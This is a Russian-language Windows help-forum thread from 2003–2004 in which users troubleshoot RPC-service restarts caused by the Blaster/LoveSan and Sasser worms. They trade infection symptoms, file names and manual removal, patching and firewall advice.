|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM), a также lsass.exe
Ошибка:
Система завершает работу. Сохраните данные и выйдите из системы. Все несохраненные изменения будут потеряны. Отключение системы вызвано NT AUTHORITY\SYSTEM Время до отключения 00:01:00 Сообщение Необходимо перезагрузить Windows, поскольку произошла непредвиденная остановка службы Удаленный вызов процедур (RPC)  Что делать? Решение проблемы изложено вот здесь! Помогите, пожалуйста! вчера вечером вдруг снова появилась эта чума. Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК. внешнее проявление точно как BLAST, только теперь ссылается на WINDOWS\System\lsass.exe  Компьютер заражен червем Worm.Win32.Sasser
|
системная ошибка и перезагрузка
Proantivirus Lab сообщает о появлении нового опасного и быстро распространяющегося (в том числе и по России) червя, использующего недавно открытую дырку в RPC во всех ОС семейства NT. Заражение удаленное, через 135-й порт, исполняет команды из-под Local System.
Признаки заражения: - Наличие файла msblast.exe в каталоге %WinDir%\system32. - Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы. - Наличие в системном реестре ключа HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill Настоятельно рекомендуется обновить антивирусы и/или пропатчиться. |
AUTHORITY\SYSTEM проблемка
By NNM.ru
Цитата:
|
системная ошибка и перезагрузка
|
AUTHORITY\SYSTEM проблемка
я удалила файл в Safe Mode и вроде пока сижу....
а как червь распространяеться? я ничего не качала... |
AUTHORITY\SYSTEM проблемка
|
Червь - AUTHORITY\SYSTEM проблемка
Для тех кто не хочет или не может вручную ковыряться в реестре *можно скачать утилитку
W32.Blaster.Worm Removal Tool от Symantec, которая вычистит эту хрень. Затем конечно нужно установить патч от M$ Вообще - эпидемия какая-то, прямо codered для ХP, какой-то. Практически все мои XP-знакомые, кто не ставил файерволл и выходил в интеренет вчера и сегодня, заполучили эту гадость. :( |
Червь - AUTHORITY\SYSTEM проблемка
У меня в 2k(и XP) svchost дохнет времы от времени при коннекте к Инету. Это случайно не из-за этой дыры в RPC?
Добавлено: to rus alexey Вот это забыл сказать для пользоателей W2k: http://download.microsoft.com/downlo...80-x86-ENU.exe |
Червь - AUTHORITY\SYSTEM проблемка
люди никто не выяснил, как эта гадость цепляется?
я ничего с инета не качала. вобще только наголо ХР переставила... |
Червь - AUTHORITY\SYSTEM проблемка
|
Червь - AUTHORITY\SYSTEM проблемка
Ginger вирус червь заражает удаленно через 135 порт .Удалите msblast.exe и обязательно поставьте патч заплатку чтобы эта гадость вновь удалённо не проникла к вам на машину
|
Червь - AUTHORITY\SYSTEM проблемка
fSergey
Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
Ginger
если бы ты вовремя прикрылась фаерволом, то у тебя бы не было этой проблемы. так что в очередной раз идем перечитывать топик "Файеры" |
Червь - AUTHORITY\SYSTEM проблемка
ArtemD
я пользуюсь только ХР-шным - для меня, лучше фаера нет. вспомнила, что сразу после переустановки и подключения забыла вкдючить фаер.... всё так шустро... |
Червь - AUTHORITY\SYSTEM проблемка
Переставлять не надо.
Отключаешься от сети, в сэйф моде удаляется вся эта дрянь из C:\windows\ , в реестре -run, затем патч, и включение файера. Потом можно опять в сеть При этом очень интересно смотреть на логи файервола. Достаточно минимального времени в интернете без патча или файервола, чтобы заразиться. Я вчера наблюдал по логам, как с разных адресов ко мне рвутся на 135-й порт и все это с интервалом 1-2 мин. |
Червь - AUTHORITY\SYSTEM проблемка
Ginger
Я уже поправил несколько машин у знакомых (еще вчера начал :) ) Там всё помогает. Только не стоит ставить заплатку на инфицированную машину или в интернет выходить на непропатченной (или без файервола) машине,- заразишься снова, причем в течении нескольких секунд. Добавлено: Во как! Цитата:
Поторопитесь кто не успел! |
Червь - AUTHORITY\SYSTEM проблемка
to mb
Я уже думал об атаке на Мелкософт Если дыра есть и Вы лезете в Инет и винда говорит типа сдох svchost.exe, то значит вирус пытался залезть к Вам, но не смог(кстати, и не сможет!!! но другой???)-> срочно качайте апдейт. Я проверял на нескольких машинах - червь криво написан и не везде может установиться. Если червь проявил, читайте весь топик!!! |
Червь - AUTHORITY\SYSTEM проблемка
Только что прочитал о том что обнаружена новая модификация червя
Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
Ребята! Помогите, чайнику!
Эти окошки выскакивали и выскакивали все чаще и чаще, отключив кабельный модем я проверила через DrWeb на вирусы - чисто, запустила Ad-aware - ничего. Вечером компьтер не включался с кабелькой, и я запустила Windows Update, потом мониторе было окно, что Windows Update прошло успешно. Все вроде заработало. Я еще раз проверила компьютер антивирусниками DrWeb, Касперским, потом Symantec нашла, но ни один из них не обнаружил никаких признаков вируса. Окно больше не выскакивает, но на сегодня проблема такая заплатка не ставиться, ругается, многие параметры (или как их там) Windows не загружает, ругается, Firewall не подключается. Сегодня я решила запустить Дефрагментацию диска, когда открыла, то увидела, что у нас на компьютере, вместо 45% свободного места, сейчас только 3%. И появилась папка на диске С: 40dc704ed2111e6d2a8a5f5d6c9da0be Я думаю, что это Update сохранило старые данные. Пробовала ее удалить - не удаляется, если всей папкой, начинается все нормально, но буквально через пару секунд окошко удаления просто исчезает, а если зайти в папку, то по одному файлы (в основном .dll) можно удалить, но как-то так медленно оно удаляется, что аж жутко, вдруг что нужное удаляю. И незнаю что сней делать - папка эта на 214MB. |
Червь - AUTHORITY\SYSTEM проблемка
Eglantine
Цитата:
а удалить попытайтесь в Саф Моде |
Червь - AUTHORITY\SYSTEM проблемка
Ну это я предполагаю, что это папка виндовского апдейта, может еще что, но я из нее несколько фалов удалила, ничего компьютер пока работает и еще когда удаляешь по одному файлы, их нет потом в корзине. Вообщем кошмар какой-то, незнаю что с ней делать. Вы думаете что надо удалять? Пожалуйста, объясните поподробнее как это удалить в Саф Моде?
Спасибо огромное. [s]Исправлено: Eglantine, 7:59 15-08-2003[/s] [s]Исправлено: Eglantine, 8:01 15-08-2003[/s] |
Червь - AUTHORITY\SYSTEM проблемка
Ginger
Цитата:
Eglantine При загрузке компа, перед появлением лого, нажимай F8, можно много раз нажимать, пока не попадёшь в загрузочное меню, там есть пункт "Безопасный режим" или Safe Mode - грузись в него и попробуй поудалять мусор лишний. Убивание вируса: 1. ОБЯЗАТЕЛЬНО нажми CTRL+SHIFT+ESC, если в списке процессов есть файл msblast.exe, то ЗАВЕРШИ ЕГО! 2. Пуск-выполнить-msconfig-автозагрузка, найди файл msblast.exe и сними с него автозагрузку. 3. В папке \windows\system32 найди этот самый msblast.exe и УБЕЙ ЕГО! После всех этих извращений попытайся установить заплатку заново, не перегружаясь. Если чего, у меня все заплятки к Win2000 и WinXP есть, в том числе и eng. |
Червь - AUTHORITY\SYSTEM проблемка
У нас в локальную сеть тоже попал червь, за несколько минут все уже заразились. Никто не сообщил на форуме что он удаляет что либо на винте. У всех нас были отформатированы партиций под FAT32, NTFS червь не трогал. Возможно это модификация.
|
Червь - AUTHORITY\SYSTEM проблемка
Guest
Да ничего он вроде не удаляет. Сидит себе "мирно" в system32 и вызывает ошибки в службе RPС. Добавлено: И ещё, червь этот кажись LoveSan зовётся. Добавлено: А группа NT AUTHORITY\SYSTEM содержит в себе Debugger Users, которые могут Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
Siava one
Цитата:
Цитата:
Guest здесь, наверно, у всех НТФС, поэтому никому ничего не форматировали. |
Червь - AUTHORITY\SYSTEM проблемка
Попробовала удалить эту папку в Safe Mode, всей папакой не удаляется. Зашла в папку и удалила все файлы из нее, но там есть несколько папок: asms, download, ic, new, update - которые не удаляются, не открываются, при наводе на них курсора выходит надпись, что папка пустая. Вообщем когда пытаюсь открывать эти папки, выходит окошко, что C:\40dc704ed2111e6d2a8a5f5d6c9da0be\asms is not accessible.
Access is denied. А если пробую удалять, то Cannot delete asms: Access is denied. Make sure the disk is not full or write-protected and that the file is not currently in use. И место на диске увеличилось всего на 1%, сейчас стало 4%, но вроде больше ничего постороннего нет. По всем этим пунктам, ничего похожего нет: Убивание вируса: 1. ОБЯЗАТЕЛЬНО нажми CTRL+SHIFT+ESC, если в списке процессов есть файл msblast.exe, то ЗАВЕРШИ ЕГО! 2. Пуск-выполнить-msconfig-автозагрузка, найди файл msblast.exe и сними с него автозагрузку. 3. В папке \windows\system32 найди этот самый msblast.exe и УБЕЙ ЕГО! Пыталась снова установить заплатку, но безуспешно, опять ругается: KB823980 Setup Error Setup could not verify the integrity of the file Update.inf. Make sure the Cryptographic service is running on this computer. Может это троян мозги морочит? Вообщем, не так давно Dr.Web обнаружил у меня на компе трояна в двух местах, но лечить не предложил, я все излазила, пыталась найти как вылечить ничего не получилось и я их просто удалила. После этого проверяла Dr. Web неоднократно и Касперским и еще Бог знает чем, ничего не обнаруживалось больше. Незнаю может это все-таки где сидит? Кошмар какой-то. |
Червь - AUTHORITY\SYSTEM проблемка
Вот сейчас залезла в сервисы проверить включен ли Cryptographic, он-то включен, но заметила там кое-что интересное, раньше мне кажется этого не было.
Вот: Name: Error Reporting Service Description: Allows error reporting for services and applictions running in non-standart environment. Status: Started Startup Type: Automatic Log On As: Local System А может все эти проблемы сейчас от этой строчки? А что с ней делать? |
Червь - AUTHORITY\SYSTEM проблемка
Eglantine
Всё не то. С самого начала. Не надо было ничего скачивать на зараженную машину. Не стоило надеяться на антивирусы даже с регулярными обновленими. Большинство из них абсолютно ничего не знало о бластере вплоть до 11 августа. Насколько я знаю Семантек выпустил обновление обнаруживающее вирус только 11 -го поздно вечером. Касперский и д-р Веб несколько позже. пытаться найти вирус с обновлениями раньше 12-го августа бессмысленно. Самое главное что надо было сделать - это убить процесс выкинуть blast.exe из авторуна в реестре и ВКЛЮЧИТЬ ФАЙЕРВОЛ. Заплата в такой ситуации- дело не первостепенное. главное -удалить вирус и поставить Файервол потому что он закрывает этот поганый epmap(135 порт). Надеюсь system restore ты не отключала? если ты пыталась установить обновление оно обязано было сделать контрольную точку. Вернись к ней, отключи ресторе, очисти от всех контрольных точек (cleanmgr.exe), удали вирус отовсюду и включи файервол, хотя бы встроенный. Затем можешь поставить патч. Включи ресторе - сделай контрольную точку и снова очисть диск - от всех контрольных точек кроме последнй и только после этого подключай кабельки и модемы :) PS C:\40dc70.. это папка незавершившегося обновления Вот такая, мама, здесь у нас программа |
Червь - AUTHORITY\SYSTEM проблемка
Надеюсь system restore ты не отключала?
если ты пыталась установить обновление оно обязано было сделать контрольную точку. Вернись к ней, отключи ресторе, очисти от всех контрольных точек (cleanmgr.exe), удали вирус отовсюду и включи файервол, хотя бы встроенный. Затем можешь поставить патч. Включи ресторе - сделай контрольную точку и снова очисть диск - от всех контрольных точек кроме последнй и только после этого подключай кабельки и модемы. _____________________________________________- System restore я не отключала. Пожалуйста подскажите, где эта котрольная точка, я обычный чайник и если не сложно объясните поподробнее. PLS Добавлено: И еще подскажите пожалуйста, на диске С папка I386 (С:\I386), она и до этого всего была, но сейчас она просто огромная стала. Я незнаю, ведь такая же папка есть в С:\Windows\I386 можно что-то из нее удалять или можно ее всю удалить, вообще она должна быть на С? |
Червь - AUTHORITY\SYSTEM проблемка
Eglantine
пуск-программы-стандартные-служебные -восстановление системы Запусти программу и ты увидишь что-то наподобие календаря, в котором жирным цветом будут выделены дни когда создавались контрольные точки (в один день их может быть несколько). Выбери последний (или какой захочешь) и нажми восстановить. Все будет восстановлено плоть до того состояния когда была создана эта к.т. Имей ввиду, восстановление может затронуть все диски и если у тебя в этот промежуток времени (от сегодня до контрорльной точки) где-то были записаны, какие-либо важные даннные -они исчезнут. Чтобы избежать этого, надо на вкладке - мой компьютер-свойства -восстановление системы удалить наблюдение со всех дисков кроме системного (обычно диск с:/ ) Эта операция (восстановление системы) полностью обратима- т.е. если после восстановления системы тебе что-то не понравится, ты всегда посредством той же программы, сможешь отменить это восстановление *Там же можно самому принудительно создавать контрольные точки, обычно это делается перед каким либо сильными действиями, которые могут задеть систему. Если что-то непонятно не забывай использовать клавишу f1 там все очень подробно описано Добавлено: папка I386- содержит файлы дистрибутива. При наличии загрузочного диска XP, без неё вполне можно обойтись [s]Исправлено: mb, 2:19 16-08-2003[/s] |
Червь - AUTHORITY\SYSTEM проблемка
xcv
Кроме микрософтовских заплаток есть утилиты от касперского и symantec. Почитай вот эту статейку: http://www.3dnews.ru/editorial/lovsan/ А это с новостей касперского: http://www.kaspersky.ru/news.html Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
Как вам такая новость?
Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
Млин кажется и я его словил. Просто как-то я разговаривал с Макслой по асе и он сказал мне, что кажется подхватил вирус и дал мне линк на этот топик. Я почитал запомнил, что-то про svhost 8). Вчера сидел в инете и мой svhost.exe "допустил недодопустимую...". я отрубился от инета. Запустил Ad-Aware 6 он нашел два троянца (или че там он ищет? 8)) потом Каспера - он ничего не нашел (может из-за того что я не обновлял базу антивирусную). Потом я пошел в смотреть телик, но комп не выключал, и позже комп сам вырубился... Я поискал файлы msblast.exe и teekids.exe и к счастью ничего не нашел и в автозагрузке ничего нет... Может это не он? Но интересно что это было?
А заплатку я сегодня скачаю для своей win2k rus |
Червь - AUTHORITY\SYSTEM проблемка
lossen
Цитата:
|
Червь - AUTHORITY\SYSTEM проблемка
|
Червь - AUTHORITY\SYSTEM проблемка
После прочтения всей темы в целом, спешу сообщить, что кроме трех обсуждаемых "обличий" червя появилось еще одно - mslaugh.exe
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Пытаюсь запустить программу Windows2000-KB823980-x86-RUS.exe - а ничего не получается, т.к. просит установления пакета обновления 2. Объясните - что это такое и где это взять?
Заранее благодарю.:biglaugh: |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
у меня файла msblast.exe в системе не было, долго мучился, но в конце концов нашел файл svhost1.exe который и является телом этого грёбанного вируса, также советую в реестре искать строку "configuration loading", "svhost1.exe" и удалать безжалостно. На пока вирус не обнаруживается...
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
новый способ избавиться от перезагрузок:
нажымаете правой кнопкой мыши на *мой комп* >manage>services and applications>services>далее ищем в списке (RPC) первый открываем>recovery>first failure>restart the services жмём выполнить. тоже самое со вторым(RPC). и закрываем все окна . удачи. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Demonisiuns
Пуск->Выполнить->compmgmt.msc->Ок->Службы и Приложения. Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
могу только посочувствовать...
эта проблема у меня тоже была... мучаться я с ней не стал... поскольку времени на борьбу с неизвестным Х-вирусом или трояном не было. скажу что Цитата:
не делайте этого... бесполезно... глючить будет еще хуже... при таком раскладе уже и так все ясно что сбои будут все чаще и чаще до такого момента когда перестанет загружаться комп. (только в безопасном режиме будет работать поскольку процессы запускаемые svchost работают только в нормальном) в фаерволе проверьте... контролирует ли он важные порты зарезервированые системой... особенно порт DCOM (135) на TCP и UDP... в Agnitum Outpost Firewall 1 версии это надо сделать вручную а во 2 версии она уже прописана. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Flexx
Цитата:
А дело все в том, что я где-то в ноябре переинсталлировала систему, честно до переустановки антивиря к инету не подключалась, как только подключилась - сразу обновила антивирь, а вот виндовские апдейты-то.... И получила принудительный перегруз *(сабж) ровно через пять минут. Самое смешное, что у нас прокси выставлен ИСКЛЮЧИТЕЛЬНО на порт 3128, к хосту своего сайта я через 2082 подключиться не могу, а вот черви - пожалуйста. На кой хрен тогда тот прокси????? Так вот, верещит Каспер почему-то часто в оффлайне (речь идет о лэптопе, который я иногда приношу на работу), а недавно за очень короткий промежуток времени произошло 2 события: 1) в один прекрасный день, когда долго сидела в инете, у меня вдруг обнулился IP :o . Ну, енто дело я автовосстановила и списала на глюки, которые в тот день у нас по всей локалке были. 2) А потом как-то Каспер впервые заверещал во время подключения к инету, а потом у меня вдруг открылся Аутлук Экспресс *с каким-то адресом в адресной строке (по умолчанию для создания почтовых сообщений используется Ворд), так что я сразу поняла, что дело нечисто и выдернула шнурок из дырочки :). Я так понимаю, зараженных становится все меньше, и авторы червя пользуются этими ценными для них последними могиканами. ЗЫ. Теперь понимаю, чего я тогда сразу после переустановки Винды не смогла включить автоапдейт. Так с тех пор и не апдейтилась - не думала, что заражение возможно при том, что сидишь на прокси и пользуешь антивирь. Так что при бреши в ОСи тот антивирь до одного места. Посему страшно благодарна Вадикану за то, что указал мне на эту тему, поскачивала все патчи, лечения и т.п., теперь может и автоапдейт включу :). Всем, у кого проблемы, советую полностью прочитать эту тему, тут уже есть ВСЕ, что надо. Если Вам не хватает - идите лечитесь (не антивирем и не патчами, а в поликлинику). :oszone: [s]Исправлено: magda, 14:03 10-02-2004[/s] [s]Исправлено: magda, 14:05 10-02-2004[/s] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Вот скажите мне люди умные, служба эта Blast`ом останавливается(RPC), но она то ведь жизненно необходима для Windows Installera! У меня проблемы с ним после заражения- не хотят запускаться установщики: кто нить сталкивался с этим? Заранее спасибо.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Sergggg
Из вашего сообщения неясно был ли (корректно) удален червь. Инструкция по удалению. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Vadikan
Удалял я его как обычно:) Установил update, проверил утилитой clrav.com, но к моему удивлению она ничего не нашла. Покопался сам в реестре и в папочке System32-ничего! |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Sergggg
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
У меня такой вопрос (с целью выяснения дальнейших действий). Тут обнаружил я как-то пятый svchost.exe. Странно, думаю, третий системный, ну и один из них остановил. :biggrin: Тут же появилось известное окошко nt/authority... перезагрузка через минуту и т.д. Инет подключен не был. В общем хотелось бы знать, что с этим добром делать, ну всмысле, требуется ли лечение?
[s]Исправлено: Yoghurt, 17:44 20-02-2004[/s] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Yoghurt
В общем, хотелось бы порекомендовать прочтение самого первого поста в теме. И заодно фильтр по svchost. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Vadikan
Всю эту тему я не раз перечитывал, ответа здесь нет. А по поводу svchost'овых тем: там упоминается о появлении окна NT/AUTHORITY SYSTEM при завершении одного svchost'a, но ответа не дается. С инетом проблем у меня нет. Может быть, я некорректно задал вопрос: всегда ли появление этого окна связано с червем (неужели, никто не хочет это проверить)? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Yoghurt
Как минимум в двух темах про svchost есть мои посты со ссылкой на статью в М$ КВ, где описано как определить процессы стоящие за каждым из svchost'ов. Хорошо, я сейчас проверю выдается ли сообщение при убивании процесса ;-) Ответ дам часиков через 12. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Vadikan
ОК, подожду. :) Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Да, появляется окно. Видимо червь просто убивал процесс, отсюда и окно. Ну а раз все чисто, то и беспокоиться не о чем ;-)
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Vadikan
Ладно, пасиб за содействие. :) [s]Исправлено: Yoghurt, 10:12 23-02-2004[/s] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
у меня тоже происходила остановка службы RPC ... и я посмотрел как надо удалить вирус выше указанными способами, до этого у меня уже были последние апдейты, но вируса я никакого не обнаружил ??? и не пойму почему у мнея происходила остановка службы RPC ??? потом я включил брандмауэр XP - шный и у меня больше не вылазеет эта надпись и перезагрузки соответственно не происходит ... но как только я выключу брандмауэр, то опять начинается эта остановка службы RPC и перезагрузка =(((...
просто при включенном брандмауэре мне не отправляются нетсенды и радио через винамп не послушаешь |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Danchik
Так надо обновление установить. Читайте самый первый пост в теме. Обновление уже входит в Пакет Обновлений 1 (Update Rollup 1) http://support.microsoft.com/default...;Product=winxp |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Sergggg
Увидел проблему похожую на мою ХР Р (анг) стоит почти 2 года столько же Интернет Ни каких пробле не было Две недели назад стало похоже что поймал msblast Однако ни msblast, teekds и т. п. w32.worm.blaster и др. ничего не нашли. К тому же перестали работать установщики и некоторы утилиты Их окна появляются и исчезают через несколько секунд. Пробовал вернуть систему назад с System Restore. Комп выключаться перестал. Но проблема с установщиками и regedit осталась Я не специалист в этом деле. Можно ли востановить работу установщиков? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
У меня был msblast но я symantec'овскую утилиту запустил, выкинул и она написала что червь успешно выброшен и файлы с ним удалены. но rpc почемуто все равно останавливается. тогда я включил чтобу она перезапускалась через 0 мин. после выключения. теперь комп не перегружается но через пару минут в инете винд начинает глючить. причем он не тормозит а делает всякие ошибки например перестает копировать текст, в explorere не работает функция открыть в новом окне, при выключении он зависает и т.д. Что делать?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest 62.183.50.*
Фаервол установлен? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
нет
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest 62.183.15.*
Ну тогда читаем самый первый пост в теме еще раз ;-) |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
При подключении к интернет постоянно приходится вводить пароль так-как идет сообщение о том что неправильный пароль .Перепробовал кучу дозвонок думал в ней дело всё то-же самое копался в настройках но там кроме как "сохранить пароль " .Помогите а то я уже задолбался каждый раз пароль вводить.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest 217.23.178.*
Перезагрузки же нет? Так зачем постить в этой теме? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Кое как избавился от ловсана, причём переустановил winXP с сервиспаком включил файаволл и ничего не помогло ловсан залез чем только его не лечил бесполезно он появляется вновь и вновь причём антивирусный монитор его не лечит, и очистка всех возможных мест автозагрузки тоже не помогла...
надежда только на заплатку |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Без заплатки можно отключить через Панель управления/Администратирование/Службы Удаленный вызов процедур (RPC), вкладка восстановление, указать действие при збое - "не выполнять никаких действий" во всех случаях
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
"Четыре новых уязвимостей в RPC/DCOM в Microsoft Windows 4.0/2000/XP/2003"
Опасность: Критическая |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
ArtemD
Спасибо, я уже проинформировал участников о 4 новых и 1 обновленном апдейтах в прикрепленной теме "Важнейшие обновления системы" |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Весьма тупой вопрос. Как закрыть во втором аутпосте определенные порты?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest 80.243.65.*
Вопрос не то чтобы тупой, он просто не по адресу. Он бы и не возник, если б вы почитали справку к программе. http://forum.oszone.net/topic.cgi?fo...&topic=666 |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Народ, кто подскажет , как убить mslaugh : сидит только в автозагрузке, но не загружается, в реестре нет, в системной папке нет, в процессах нет, и , в принципе, ничего не делает, вроде. Не перегружает машину точно. Че делать?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Воспользоваться Симантековской утиллитой для удаления червя.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
не убивается и не находит этот лаф fixblast
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest
Ну хорошо, если ты знаешь где он сидит, то почему бы его просто не удалить? а не делает ничего так как прошел его срок активности давно... |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
а как его удалить из автозагрузки? Его не видит регклинер, его нет в реестре,нигде я его не могу найти. Кстати, он никогда и не работал, я его случайно увидела, но что его не было-это точно. Бластом болели, вылечились, защиту поставили. Откуда ж эта херня взялась?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest
что-то я совсем тебя не пойму... может не выспался... Цитата:
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Помогите, пожалуйста!
вчера вечером вдруг снова появилась эта чума. Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК. внешнее проявление точно как BLAST, только теперь ссылается на WINDOWS\System\lsass.exe |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
У меня та же беда ,и семантек ничего не находит и то же сообщение от WINDOWS\System\lsass.exe
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Тупо заходишь в безопасный режим и тупо удаляешь этот файлик. Но перед этим ставишь firewall и заплаты на винду.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Спасибо, уже нашел, есть сообщение на microsoft.com
Зовут его sasser worm есть уже patch и removal tool. :up: [s]Исправлено: plabor, 15:07 2-05-2004[/s] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
P.S. через сейф мод не пробовала |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
После нападения Gaobot.gen и успешного его удаления вручную я не могу зайти на symantec.com (LiveUpdate тоже не хотит к нему конектится) и на viruslist.ru .Заплаты стоят. вирусов нет. что посоветуете,,?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Guest 80.243.65.*
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Внешнее проявление вируса точно такое же как BLAST, только теперь ссылака на WINDOWS\System\lsass.exe
Никакие антивирусные программы, включая самые, самые последние, никаких вирусов не обнаруживают. Нет и файлов сопутствующих вирусам "Blaster" или "Sasser". Но после перезагрузки компьютера все возвращается на круги своя - как только вошел в Интернет, появляется окошко с предупреждением о перезагрузке. Что бы это значило? Подскажите, кто знает. Разумеется, если загрузить соответствующий патч, принудительная загрузка компьютера не происходит. Спасибо. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Boikov
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Вероятно, я недостаточно четко сформулировал свой вопрос. Мне известно, как защититься от вирусов Blast или Sasser. Мне непонятно почему после перезагрузки компьютера, вызванной действием вируса, следов вируса обнаружить не удается. Как известно червь Sasser имеет три разновидности. Sasser a будто бы создает файл avserve.exe; Sasser b - avserve2.exe; Sasser c - skynetave.exe. После перезагрузки компьютера (до установки "патча" и брандмауера) этих файлов нп компьютере нет. Не обнаруживает следов вируса и последняя антивирусная программа FxSasser. Может быть это еще какая-то разновидность вируса Sasser? Заранее благодарю за ответ.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Boikov
Пожалуйста, задайте ваш вопрос в форуме Информационная Безопасность. Именно там обсуждаются методы защиты и обнаружения вирусов. Там даже есть тема про Sasser. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Поймал и я эту хренотень. вот сижу читаю топик и качаю апдэйт, удалил этот бласт файл , думаю должно помочь.
Да иеще одно время от времени выскакивает окошко Инструкция по адресу 0x009ef878 обратилась к памяти по адресу 0x000000023 Память не может быть read и две кнопки ок и отмена жмешь любую и выскакивает знакомое окошко для перезагрузки. ах да заголовок окна Isass.exe ошибка приложения |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Так... ну и чо... у всех чума уже закончилась месяц назад, да?...
А у меня вот только началась.... В системных файлах, процессах и автозагрузке проверял всё, ничё подозрительного. У мня 2к(рус) и ХР(РЕ,sp1+заплатки). Глючат обе. Перезагружается сразу, никакой те минуты для прощанья. Ща поставил в 3-ий раздел ещё ХР, качаю новые заплаты. даже если поможет, как те два вина к жизни вернуть? они ни в одном из режимов не грузятся (точнее, сразу перезагружаются)!!! Если ток из консоли восстановления мон вход выполнить... но эт на вряд поможет. Откат непомогает=((( Заранее спасибо. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
